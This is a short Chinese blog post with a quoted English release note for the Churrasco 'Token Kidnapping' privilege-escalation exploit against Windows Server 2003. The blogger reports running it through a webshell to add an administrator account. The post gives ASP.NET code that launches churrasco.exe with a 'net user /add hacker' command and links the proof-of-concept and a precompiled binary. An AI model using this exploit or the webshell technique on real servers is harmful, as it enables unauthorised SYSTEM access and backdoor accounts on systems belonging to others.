这个0day的漏洞发布已经有一段时间了,我也一直没有用过。今天在测试windows 2003 提权的时候想到了这个。我在一台全补丁的Windows Server 2003 SP2上测试成功。首先通过webshell上传的服务器上,以用户Network Service的权限执行,成功的添加了管理员账号。我用的是冷漠的blog上下载的编译好的程序。
It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows services accounts can impersonate. Other process (not services) that can impersonate are IIS 6 worker processes so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recomend to not allow users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
-Exploiting IIS 6 with ASP .NET :
…
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath(“churrasco.exe”);
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= ” \”net user /add hacker\” “;
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
…
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
编译好的程序:Churrasco.rar
本文还暂无回复